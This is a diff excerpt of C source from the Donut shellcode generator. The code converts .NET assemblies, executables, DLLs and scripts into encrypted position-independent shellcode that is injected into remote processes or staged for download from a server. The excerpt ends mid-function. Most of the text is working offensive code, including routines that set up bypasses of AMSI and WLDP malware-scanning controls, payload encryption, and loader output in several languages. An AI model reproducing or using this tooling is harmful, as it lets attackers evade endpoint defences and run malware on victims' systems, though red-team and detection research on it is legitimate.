669 uint32_t mod_len, data_len;
670 void *data;
671 int err = DONUT_ERROR_SUCCESS;
514672
515673 DPRINT("Entering.");
516674
675 // Compress the input file?
676 if(c->compress != DONUT_COMPRESS_NONE) {
677 err = compress_file(c);
678
679 if(err != DONUT_ERROR_SUCCESS) {
680 DPRINT("compress_file() failed");
681 return err;
682 }
683 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.zlen, fi.zdata);
684 data = fi.zdata;
685 data_len = fi.zlen;
686 } else {
687 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.len, fi.data);
688 data = fi.data;
689 data_len = fi.len;
690 }
517691 // Allocate memory for module information and contents of file
518 len = sizeof(DONUT_MODULE) + fi->size;
519 DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
520 mod = calloc(len, 1);
692 mod_len = data_len + sizeof(DONUT_MODULE);
693
694 DPRINT("Allocating %" PRIi32 " bytes of memory for DONUT_MODULE", mod_len);
695 mod = calloc(mod_len, 1);
521696
522697 // Memory not allocated? exit
523698 if(mod == NULL) {
699 DPRINT("calloc() failed");
524700 return DONUT_ERROR_NO_MEMORY;
525701 }
526702
527 // Set the type of module
528 mod->type = fi->type;
529
703 // Set the module info
704 mod->type = fi.type;
705 mod->thread = c->thread;
706 mod->compress = c->compress;
707 mod->unicode = c->unicode;
708 mod->zlen = fi.zlen;
709 mod->len = fi.len;
710
530711 // DotNet assembly?
531712 if(mod->type == DONUT_MODULE_NET_DLL ||
532713 mod->type == DONUT_MODULE_NET_EXE)
533714 {
534 // If no domain name specified, generate a random one
535 if(c->domain[0] == 0) {
536 if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
537 err = DONUT_ERROR_RANDOM;
538 goto cleanup;
715 // If no domain name specified in configuration
716 if(c->domain[0] == 0) {
717 // If entropy is disabled
718 if(c->entropy == DONUT_ENTROPY_NONE) {
719 // Set to "AAAAAAAA"
720 memset(c->domain, 'A', DONUT_DOMAIN_LEN);
721 } else {
722 // Else, generate a random name
723 if(!gen_random_string(c->domain, DONUT_DOMAIN_LEN)) {
724 DPRINT("gen_random_string() failed");
725 err = DONUT_ERROR_RANDOM;
726 goto cleanup;
727 }
539728 }
540729 }
541 // convert to unicode format.
542 // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
730 // Set the domain name to use in module
543731 DPRINT("Domain : %s", c->domain);
544 utf8_to_utf16(mod->domain, c->domain);
732 strncpy(mod->domain, c->domain, DONUT_DOMAIN_LEN);
545733
546734 // Assembly is DLL? Copy the class and method
547735 if(mod->type == DONUT_MODULE_NET_DLL) {
548736 DPRINT("Class : %s", c->cls);
549 utf8_to_utf16(mod->cls, c->cls);
737 strncpy(mod->cls, c->cls, DONUT_MAX_NAME-1);
550738
551739 DPRINT("Method : %s", c->method);
552 utf8_to_utf16(mod->method, c->method);
740 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
553741 }
554742 // If no runtime specified in configuration, use version from assembly
555743 if(c->runtime[0] == 0) {
556 strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
744 strncpy(c->runtime, fi.ver, DONUT_MAX_NAME-1);
557745 }
558746 DPRINT("Runtime : %s", c->runtime);
559 utf8_to_utf16(mod->runtime, c->runtime);
747 strncpy(mod->runtime, c->runtime, DONUT_MAX_NAME-1);
560748 } else
561 // Unmanaged DLL? check for exported api
562 if(mod->type == DONUT_MODULE_DLL &&
563 c->method[0] != 0)
564 {
749 // Unmanaged DLL? copy function name to module
750 if(mod->type == DONUT_MODULE_DLL && c->method[0] != 0) {
565751 DPRINT("DLL function : %s", c->method);
566 strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
752 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
567753 }
568754
569755 // Parameters specified?
570756 if(c->param[0] != 0) {
571 strncpy(parambuf, c->param, sizeof(parambuf)-1);
572 cnt = 0;
573 // Split by comma or semi-colon
574 param = strtok(parambuf, ",;");
575
576 while(param != NULL && cnt < DONUT_MAX_PARAM) {
577 if(strlen(param) >= DONUT_MAX_NAME) {
578 DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)",
579 param, DONUT_MAX_NAME);
580 err = DONUT_ERROR_INVALID_PARAMETER;
581 goto cleanup;
757 // If file type is unmanaged EXE
758 if(mod->type == DONUT_MODULE_EXE) {
759 // If entropy is disabled
760 if(c->entropy == DONUT_ENTROPY_NONE) {
761 // Set to "AAAA"
762 memset(mod->param, 'A', 4);
763 } else {
764 // Generate 4-byte random name
765 if(!gen_random_string(mod->param, 4)) {
766 DPRINT("gen_random_string() failed");
767 err = DONUT_ERROR_RANDOM;
768 goto cleanup;
769 }
582770 }
583 DPRINT("Adding \"%s\"", param);
584 // convert ansi string to wide character string
585 utf8_to_utf16(mod->param[cnt++], param);
586
587 // get next parameter
588 param = strtok(NULL, ",;");
589 }
590 // set number of parameters
591 mod->param_cnt = cnt;
592 }
593
594 // set length of module data
595 mod->len = fi->size;
596 // read module into memory
597 memcpy(&mod->data, fi->map, fi->size);
771 // Add space
772 mod->param[4] = ' ';
773 }
774 //
775 // Copy parameters
776 strncat(mod->param, c->param, DONUT_MAX_NAME-6);
777 }
778 DPRINT("Copying data to module");
779
780 memcpy(&mod->data, data, data_len);
598781 // update configuration with pointer to module
599782 c->mod = mod;
600 c->mod_len = len;
601
783 c->mod_len = mod_len;
602784 cleanup:
603785 // if there was an error, free memory for module
604 if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
786 if(err != DONUT_ERROR_SUCCESS) {
787 DPRINT("Releasing memory due to errors.");
605788 free(mod);
606 c->mod = NULL;
607 c->mod_len = 0;
608 }
609 DPRINT("Leaving.");
789 }
790 DPRINT("Leaving with error : %" PRId32, err);
610791 return err;
611792 }
612793
613 static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
794 /**
795 * Function: build_instance
796 * ----------------------------
797 * Creates the data necessary for main loader to execute VBS/JS/EXE/DLL files in memory.
798 *
799 * INPUT : Pointer to a Donut configuration.
800 *
801 * OUTPUT : Donut error code.
802 */
803 static int build_instance(PDONUT_CONFIG c) {
614804 DONUT_CRYPT inst_key, mod_key;
615 PDONUT_INSTANCE inst;
616 uint64_t inst_len;
805 PDONUT_INSTANCE inst = NULL;
806 int cnt, inst_len;
617807 uint64_t dll_hash;
618 int cnt;
808 int err = DONUT_ERROR_SUCCESS;
619809
620810 DPRINT("Entering.");
621811
622812 // Allocate memory for the size of instance based on the type
623 DPRINT("Allocating space for instance");
813 DPRINT("Allocating memory for instance");
624814 inst_len = sizeof(DONUT_INSTANCE);
625815
626 // if this is a PIC instance, add the size of module
816 // if the module is embedded, add the size of module
627817 // that will be appended to the end of structure
628 if(c->inst_type == DONUT_INSTANCE_PIC) {
629 DPRINT("The size of module is %" PRIi64 " bytes. "
818 if(c->inst_type == DONUT_INSTANCE_EMBED) {
819 DPRINT("The size of module is %" PRIi32 " bytes. "
630820 "Adding to size of instance.", c->mod_len);
631821 inst_len += c->mod_len;
632822 }
823 DPRINT("Total length of instance : %"PRIi32, inst_len);
824
633825 // allocate zero-initialized memory for instance
634826 inst = (PDONUT_INSTANCE)calloc(inst_len, 1);
635
827
636828 // Memory allocation failed? exit
637829 if(inst == NULL) {
830 DPRINT("Memory allocation failed");
638831 return DONUT_ERROR_NO_MEMORY;
639832 }
640833
641 #if !defined(NOCRYPTO)
642 DPRINT("Generating random key for instance");
643 if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
644 return DONUT_ERROR_RANDOM;
645 }
646 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
647
648 DPRINT("Generating random key for module");
649 if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
650 return DONUT_ERROR_RANDOM;
651 }
652 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
653
654 DPRINT("Generating random string to verify decryption");
655 if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
656 return DONUT_ERROR_RANDOM;
657 }
658 #endif
659
660 DPRINT("Generating random IV for Maru hash");
661 if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
662 return DONUT_ERROR_RANDOM;
663 }
664
665 DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);
834 // set the length of instance and pointer to it in configuration
835 c->inst = inst;
836 c->inst_len = inst->len = inst_len;
837 // set the type of instance we're creating
838 inst->type = c->inst_type;
839 // indicate if we should call RtlExitUserProcess to terminate host process
840 inst->exit_opt = c->exit_opt;
841 // set the Original Entry Point
842 inst->oep = c->oep;
843 // set the entropy level
844 inst->entropy = c->entropy;
845 // set the bypass level
846 inst->bypass = c->bypass;
847 // set the module length
848 inst->mod_len = c->mod_len;
849
850 // encryption enabled?
851 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
852 DPRINT("Generating random key for instance");
853 if(!gen_random(&inst_key, sizeof(DONUT_CRYPT))) {
854 DPRINT("gen_random() failed");
855 err = DONUT_ERROR_RANDOM;
856 goto cleanup;
857 }
858 // copy local key to configuration
859 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
860
861 DPRINT("Generating random key for module");
862 if(!gen_random(&mod_key, sizeof(DONUT_CRYPT))) {
863 DPRINT("gen_random() failed");
864 err = DONUT_ERROR_RANDOM;
865 goto cleanup;
866 }
867 // copy local key to configuration
868 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
869
870 DPRINT("Generating random string to verify decryption");
871 if(!gen_random_string(inst->sig, DONUT_SIG_LEN)) {
872 DPRINT("gen_random() failed");
873 err = DONUT_ERROR_RANDOM;
874 goto cleanup;
875 }
876
877 DPRINT("Generating random IV for Maru hash");
878 if(!gen_random(&inst->iv, MARU_IV_LEN)) {
879 DPRINT("gen_random() failed");
880 err = DONUT_ERROR_RANDOM;
881 goto cleanup;
882 }
883 }
884
885 DPRINT("Generating hashes for API using IV: %" PRIX64, inst->iv);
666886
667887 for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
668888 // calculate hash for DLL string
672892 // xor with DLL hash and store in instance
673893 inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;
674894
675 DPRINT("Hash for %-15s : %-22s = %" PRIX64,
895 DPRINT("Hash for %-15s : %-22s = %016" PRIX64,
676896 api_imports[cnt].module,
677897 api_imports[cnt].name,
678898 inst->api.hash[cnt]);
679899 }
680 // save how many API to resolve
900
901 DPRINT("Setting number of API to %" PRIi32, cnt);
681902 inst->api_cnt = cnt;
682 inst->dll_cnt = 0;
683
684 strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
685 strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
686 strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
687 strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");
903
904 DPRINT("Setting DLL names to %s", DLL_NAMES);
905 strcpy(inst->dll_names, DLL_NAMES);
688906
689907 // if module is .NET assembly
690908 if(c->mod_type == DONUT_MODULE_NET_DLL ||
705923 {
706924 DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");
707925
708 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
709 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
710 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
711 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
712 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
713 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
714 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
715
716 utf8_to_utf16(inst->wscript, "WScript");
717 utf8_to_utf16(inst->wscript_exe, "wscript.exe");
926 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
927 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
928 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
929 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
930 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
931 memcpy(&inst->xIID_IActiveScriptSiteWindow, &xIID_IActiveScriptSiteWindow, sizeof(GUID));
932 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
933 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
934
935 strcpy(inst->wscript, "WScript");
936 strcpy(inst->wscript_exe, "wscript.exe");
718937
719938 if(c->mod_type == DONUT_MODULE_VBS) {
720939 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
721940 } else {
722941 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
723942 }
724 } else
725 // if module is XSL
726 if(c->mod_type == DONUT_MODULE_XSL)
727 {
728 DPRINT("Copying GUID structures for loading XSL to instance");
729
730 memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
731 memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
732 memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID));
733 }
734
735 // required to disable AMSI
736 strcpy(inst->amsi.s, "AMSI");
737 strcpy(inst->amsiInit, "AmsiInitialize");
738 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
739 strcpy(inst->amsiScanStr, "AmsiScanString");
740
741 strcpy(inst->clr, "CLR");
742
743 // required to disable WLDP
744 strcpy(inst->wldp, "WLDP");
745 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
746 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
747
748 // set the type of instance we're creating
749 inst->type = c->inst_type;
750
943 }
944
945 // if bypassing enabled, copy these strings over
946 if(c->bypass != DONUT_BYPASS_NONE) {
947 DPRINT("Copying strings required to bypass AMSI");
948
949 strcpy(inst->clr, "clr");
950 strcpy(inst->amsi, "amsi");
951 strcpy(inst->amsiInit, "AmsiInitialize");
952 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
953 strcpy(inst->amsiScanStr, "AmsiScanString");
954
955 DPRINT("Copying strings required to bypass WLDP");
956
957 strcpy(inst->wldp, "wldp");
958 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
959 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
960 }
961
962 // if module is an unmanaged EXE
963 if(c->mod_type == DONUT_MODULE_EXE) {
964 // does the user specify parameters for the command line?
965 if(c->param[0] != 0) {
966 DPRINT("Copying strings required to replace command line.");
967
968 strcpy(inst->dataname, ".data");
969 strcpy(inst->kernelbase, "kernelbase");
970 strcpy(inst->cmd_syms, "_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv");
971 }
972 // does user want loader to run the entrypoint as a thread?
973 if(c->thread != 0) {
974 DPRINT("Copying strings required to intercept exit-related API");
975 // these exit-related API will be replaced with pointer to RtlExitUserThread
976 strcpy(inst->exit_api, "ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit");
977 }
978 }
979
751980 // if the module will be downloaded
752981 // set the URL parameter and request verb
753 if(inst->type == DONUT_INSTANCE_URL) {
754 // generate a random name for module
755 // that will be saved to disk
756 if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
757 return DONUT_ERROR_RANDOM;
758 }
759 DPRINT("Generated random name for module : %s", c->modname);
760
761 DPRINT("Setting URL parameters");
762 strcpy(inst->http.url, c->url);
982 if(inst->type == DONUT_INSTANCE_HTTP) {
983 // if no module name specified
984 if(c->modname[0] == 0) {
985 // if entropy disabled
986 if(c->entropy == DONUT_ENTROPY_NONE) {
987 // set to "AAAAAAAA"
988 memset(c->modname, 'A', DONUT_MAX_MODNAME);
989 } else {
990 // generate a random name for module
991 // that will be saved to disk
992 DPRINT("Generating random name for module");
993 if(!gen_random_string(c->modname, DONUT_MAX_MODNAME)) {
994 DPRINT("gen_random_string() failed");
995 err = DONUT_ERROR_RANDOM;
996 goto cleanup;
997 }
998 }
999 DPRINT("Name for module : %s", c->modname);
1000 }
1001 strcpy(inst->server, c->server);
7631002 // append module name
764 strcat(inst->http.url, c->modname);
1003 strcat(inst->server, c->modname);
7651004 // set the request verb
766 strcpy(inst->http.req, "GET");
767
768 DPRINT("Payload will attempt download from : %s", inst->http.url);
769 }
770
771 inst->mod_len = c->mod_len;
772 inst->len = inst_len;
773 c->inst = inst;
774 c->inst_len = inst_len;
775
776 #if !defined(NOCRYPTO)
777 if(c->inst_type == DONUT_INSTANCE_URL) {
778 DPRINT("encrypting module for download");
779
780 c->mod->mac = maru(inst->sig, inst->iv);
781
782 donut_encrypt(
783 mod_key.mk,
784 mod_key.ctr,
785 c->mod,
786 c->mod_len);
787 }
788 #endif
789 // if PIC, copy module to instance
790 if(inst->type == DONUT_INSTANCE_PIC) {
1005 strcpy(inst->http_req, "GET");
1006
1007 DPRINT("Loader will attempt to download module from : %s", inst->server);
1008
1009 // encrypt module?
1010 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1011 DPRINT("Encrypting module");
1012
1013 c->mod->mac = maru(inst->sig, inst->iv);
1014
1015 donut_encrypt(
1016 mod_key.mk,
1017 mod_key.ctr,
1018 c->mod,
1019 c->mod_len);
1020 }
1021 } else
1022 // if embedded, copy module to instance
1023 if(inst->type == DONUT_INSTANCE_EMBED) {
7911024 DPRINT("Copying module data to instance");
7921025 memcpy(&c->inst->module.x, c->mod, c->mod_len);
7931026 }
7941027
795 #if !defined(NOCRYPTO)
796 DPRINT("encrypting instance");
797
798 inst->mac = maru(inst->sig, inst->iv);
799
800 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
801
802 donut_encrypt(
803 inst_key.mk,
804 inst_key.ctr,
805 inst_data,
806 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
807 #endif
808 DPRINT("Leaving.");
809
810 return DONUT_ERROR_SUCCESS;
811 }
812
813 // given a configuration, create a PIC that will run from anywhere in memory
814 EXPORT_FUNC
815 int DonutCreate(PDONUT_CONFIG c) {
816 uint8_t *pl;
817 uint32_t t;
818 int url_len, err = DONUT_ERROR_SUCCESS;
819 FILE *fd;
820 file_info fi;
1028 // encrypt instance?
1029 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1030 DPRINT("Encrypting instance");
1031
1032 inst->mac = maru(inst->sig, inst->iv);
1033
1034 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
1035
1036 donut_encrypt(
1037 inst_key.mk,
1038 inst_key.ctr,
1039 inst_data,
1040 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
1041 }
1042 cleanup:
1043 // error? release memory for everything
1044 if(err != DONUT_ERROR_SUCCESS) {
1045 DPRINT("Releasing memory for module due to errors.");
1046 free(c->mod);
1047 }
1048 DPRINT("Leaving with error : %" PRId32, err);
1049 return err;
1050 }
1051
1052 /**
1053 * Function: save_file
1054 * ----------------------------
1055 * Creates a file and writes the contents of input buffer to it.
1056 *
1057 * INPUT : path = where to create file.
1058 * data = what to write to file.
1059 * len = length of data.
1060 *
1061 * OUTPUT : Donut error code.
1062 */
1063 static int save_file(const char *path, void *data, int len) {
1064 FILE *out;
1065 int err = DONUT_ERROR_SUCCESS;
8211066
8221067 DPRINT("Entering.");
823
824 DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);
825
826 if(c == NULL || c->file[0] == 0) {
827 return DONUT_ERROR_INVALID_PARAMETER;
828 }
829
830 c->mod = NULL;
831 c->mod_len = 0;
832
833 c->inst = NULL;
834 c->inst_len = 0;
835
836 c->pic = NULL;
837 c->pic_len = 0;
838
839 // instance not specified?
840 DPRINT("Validating instance type %" PRIx32 "", c->inst_type);
841
842 if(c->inst_type != DONUT_INSTANCE_PIC &&
843 c->inst_type != DONUT_INSTANCE_URL) {
844
845 return DONUT_ERROR_INVALID_PARAMETER;
846 }
847
848 if(c->inst_type == DONUT_INSTANCE_URL) {
849 DPRINT("Validating URL");
850
851 // no URL? exit
852 if(c->url[0] == 0) {
853 return DONUT_ERROR_INVALID_PARAMETER;
854 }
855 // doesn't begin with one of the following? exit
856 if((strnicmp(c->url, "http://", 7) != 0) &&
857 (strnicmp(c->url, "https://", 8) != 0)) {
858
859 return DONUT_ERROR_INVALID_URL;
860 }
861 // invalid length?
862 if(strlen(c->url) <= 8) {
863 return DONUT_ERROR_URL_LENGTH;
864 }
865 // ensure URL parameter and module name don't exceed DONUT_MAX_URL
866 url_len = strlen(c->url);
867
868 // if the end of string doesn't have a forward slash
869 // add one more to account for it
870 if(c->url[url_len - 1] != '/') {
871 strcat(c->url, "/");
872 url_len++;
873 }
874
875 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
876 return DONUT_ERROR_URL_LENGTH;
877 }
878 }
879
880 DPRINT("Validating architecture");
881
882 if(c->arch != DONUT_ARCH_X86 &&
883 c->arch != DONUT_ARCH_X64 &&
884 c->arch != DONUT_ARCH_X84 &&
885 c->arch != DONUT_ARCH_ANY)
886 {
887 return DONUT_ERROR_INVALID_ARCH;
888 }
889
890 DPRINT("Validating AMSI/WDLP bypass option");
891
892 if(c->bypass != DONUT_BYPASS_SKIP &&
893 c->bypass != DONUT_BYPASS_ABORT &&
894 c->bypass != DONUT_BYPASS_CONTINUE)
895 {
896 return DONUT_ERROR_BYPASS_INVALID;
897 }
898
899 // get file information
900 err = get_file_info(c->file, &fi);
901 if(err != DONUT_ERROR_SUCCESS) return err;
902
903 // Set the module type
904 c->mod_type = fi.type;
905
906 // Unmanaged EXE/DLL?
907 if(c->mod_type == DONUT_MODULE_DLL ||
908 c->mod_type == DONUT_MODULE_EXE)
909 {
910 DPRINT("Validating architecture %i for DLL/EXE %i",
911 c->arch, fi.arch);
912 // Requested shellcode is x86, but file is x64?
913 // Requested shellcode is x64, but file is x86?
914 if((c->arch == DONUT_ARCH_X86 &&
915 fi.arch == DONUT_ARCH_X64) ||
916 (c->arch == DONUT_ARCH_X64 &&
917 fi.arch == DONUT_ARCH_X86))
918 {
919 err = DONUT_ERROR_ARCH_MISMATCH;
920 goto cleanup;
921 }
922 // DLL function specified. Does it exist?
923 if(c->mod_type == DONUT_MODULE_DLL &&
924 c->method[0] != 0)
925 {
926 DPRINT("Validating DLL function \"%s\" for DLL", c->method);
927 if(!is_dll_export(&fi, c->method)) {
928 err = DONUT_ERROR_DLL_FUNCTION;
929 goto cleanup;
930 }
931 }
932 }
933 // .NET DLL assembly?
934 if(c->mod_type == DONUT_MODULE_NET_DLL) {
935 // DLL requires class and method
936 if(c->cls[0] == 0 || c->method[0] == 0) {
937 err = DONUT_ERROR_NET_PARAMS;
938 goto cleanup;
939 }
940 }
941
942 // is this an unmanaged DLL with parameters?
943 if(c->mod_type == DONUT_MODULE_DLL &&
944 c->param[0] != 0)
945 {
946 // we need a DLL function
947 if(c->method[0] == 0) {
948 err = DONUT_ERROR_DLL_PARAM;
949 goto cleanup;
950 }
951 }
952 // 1. Create the module
953 DPRINT("Creating module");
954 err = CreateModule(c, &fi);
955
956 if(err != DONUT_ERROR_SUCCESS)
957 goto cleanup;
958
959 // 2. Create the instance
960 DPRINT("Creating instance");
961 err = CreateInstance(c, &fi);
962
963 if(err != DONUT_ERROR_SUCCESS)
964 goto cleanup;
1068 out = fopen(path, "wb");
1069
1070 if(out != NULL) {
1071 DPRINT("Writing %d bytes of %p to %s", len, data, path);
1072 fwrite(data, 1, len, out);
1073 fclose(out);
1074 } else err = DONUT_ERROR_FILE_ACCESS;
1075
1076 DPRINT("Leaving with error : %" PRId32, err);
1077 return err;
1078 }
1079
1080 /**
1081 * Function: save_loader
1082 * ----------------------------
1083 * Saves the loader to output file. Also saves instance for debug builds.
1084 * If the instance type is HTTP, it saves the module to file.
1085 *
1086 * INPUT : Donut configuration.
1087 *
1088 * OUTPUT : Donut error code.
1089 */
1090 static int save_loader(PDONUT_CONFIG c) {
1091 int err = DONUT_ERROR_SUCCESS;
1092 FILE *fd;
9651093
9661094 // if DEBUG is defined, save instance to disk
9671095 #ifdef DEBUG
968 DPRINT("Saving instance to file");
969 fd = fopen("instance", "wb");
970
971 if(fd != NULL) {
972 fwrite(c->inst, 1, c->inst_len, fd);
973 fclose(fd);
974 }
1096 DPRINT("Saving instance %p to file. %" PRId32 " bytes.", c->inst, c->inst_len);
1097 save_file("instance", c->inst, c->inst_len);
9751098 #endif
976 // 3. If the module will be stored on a remote server
977 if(c->inst_type == DONUT_INSTANCE_URL) {
978 DPRINT("Saving %s to disk.", c->modname);
979 // save the module to disk using random name
980 fd = fopen(c->modname, "wb");
981
982 if(fd != NULL) {
983 fwrite(c->mod, 1, c->mod_len, fd);
984 fclose(fd);
985 }
986 }
987 // 4. calculate size of PIC + instance combined
1099
1100 // If the module will be stored on a remote server
1101 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1102 DPRINT("Saving %s to file.", c->modname);
1103 save_file(c->modname, c->mod, c->mod_len);
1104 }
1105
1106 // no output file specified?
1107 if(c->output[0] == 0) {
1108 // set to default name based on format
1109 switch(c->format) {
1110 case DONUT_FORMAT_BINARY:
1111 strncpy(c->output, "loader.bin", DONUT_MAX_NAME-1);
1112 break;
1113 case DONUT_FORMAT_BASE64:
1114 strncpy(c->output, "loader.b64", DONUT_MAX_NAME-1);
1115 break;
1116 case DONUT_FORMAT_RUBY:
1117 strncpy(c->output, "loader.rb", DONUT_MAX_NAME-1);
1118 break;
1119 case DONUT_FORMAT_C:
1120 strncpy(c->output, "loader.c", DONUT_MAX_NAME-1);
1121 break;
1122 case DONUT_FORMAT_PYTHON:
1123 strncpy(c->output, "loader.py", DONUT_MAX_NAME-1);
1124 break;
1125 case DONUT_FORMAT_POWERSHELL:
1126 strncpy(c->output, "loader.ps1", DONUT_MAX_NAME-1);
1127 break;
1128 case DONUT_FORMAT_CSHARP:
1129 strncpy(c->output, "loader.cs", DONUT_MAX_NAME-1);
1130 break;
1131 case DONUT_FORMAT_HEX:
1132 strncpy(c->output, "loader.hex", DONUT_MAX_NAME-1);
1133 break;
1134 }
1135 }
1136 // save loader to file
1137 fd = fopen(c->output, "wb");
1138 if(fd == NULL) {
1139 DPRINT("Opening %s failed.", c->output);
1140 return DONUT_ERROR_FILE_ACCESS;
1141 }
1142
1143 switch(c->format) {
1144 case DONUT_FORMAT_BINARY: {
1145 DPRINT("Saving loader as binary");
1146 fwrite(c->pic, 1, c->pic_len, fd);
1147 err = DONUT_ERROR_SUCCESS;
1148 break;
1149 }
1150 case DONUT_FORMAT_BASE64: {
1151 DPRINT("Saving loader as base64 string");
1152 err = base64_template(c->pic, c->pic_len, fd);
1153 break;
1154 }
1155 case DONUT_FORMAT_RUBY:
1156 case DONUT_FORMAT_C:
1157 DPRINT("Saving loader as C/Ruby string");
1158 err = c_ruby_template(c->pic, c->pic_len, fd);
1159 break;
1160 case DONUT_FORMAT_PYTHON:
1161 DPRINT("Saving loader as Python string");
1162 err = py_template(c->pic, c->pic_len, fd);
1163 break;
1164 case DONUT_FORMAT_POWERSHELL:
1165 DPRINT("Saving loader as Powershell string");
1166 err = powershell_template(c->pic, c->pic_len, fd);
1167 break;
1168 case DONUT_FORMAT_CSHARP:
1169 DPRINT("Saving loader as C# string");
1170 err = csharp_template(c->pic, c->pic_len, fd);
1171 break;
1172 case DONUT_FORMAT_HEX:
1173 DPRINT("Saving loader as Hex string");
1174 err = hex_template(c->pic, c->pic_len, fd);
1175 break;
1176 }
1177 fclose(fd);
1178 DPRINT("Leaving with error : %" PRId32, err);
1179 return err;
1180 }
1181
1182 /**
1183 * Function: build_loader
1184 * ----------------------------
1185 * Builds the shellcode that's injected into remote process.
1186 *
1187 * INPUT : Donut configuration.
1188 *
1189 * OUTPUT : Donut error code.
1190 */
1191 static int build_loader(PDONUT_CONFIG c) {
1192 uint8_t *pl;
1193 uint32_t t;
1194
1195 // target is x86?
9881196 if(c->arch == DONUT_ARCH_X86) {
989 c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
1197 c->pic_len = sizeof(LOADER_EXE_X86) + c->inst_len + 32;
9901198 } else
1199 // target is amd64?
9911200 if(c->arch == DONUT_ARCH_X64) {
992 c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
1201 c->pic_len = sizeof(LOADER_EXE_X64) + c->inst_len + 32;
9931202 } else
1203 // target can be both x86 and amd64?
9941204 if(c->arch == DONUT_ARCH_X84) {
995 c->pic_len = sizeof(PAYLOAD_EXE_X86) +
996 sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
997 }
998 // 5. allocate memory for shellcode
1205 c->pic_len = sizeof(LOADER_EXE_X86) +
1206 sizeof(LOADER_EXE_X64) + c->inst_len + 32;
1207 }
1208 // allocate memory for shellcode
9991209 c->pic = malloc(c->pic_len);
1000
1001 DPRINT("PIC size : %" PRIi64, c->pic_len);
1002
1210
10031211 if(c->pic == NULL) {
1004 err = DONUT_ERROR_NO_MEMORY;
1005 goto cleanup;
1212 DPRINT("Unable to allocate %" PRId32 " bytes of memory for loader.", c->pic_len);
1213 return DONUT_ERROR_NO_MEMORY;
10061214 }
10071215
10081216 DPRINT("Inserting opcodes");
1009 // 6. insert shellcode
1217
1218 // insert shellcode
10101219 pl = (uint8_t*)c->pic;
1220
10111221 // call $ + c->inst_len
10121222 PUT_BYTE(pl, 0xE8);
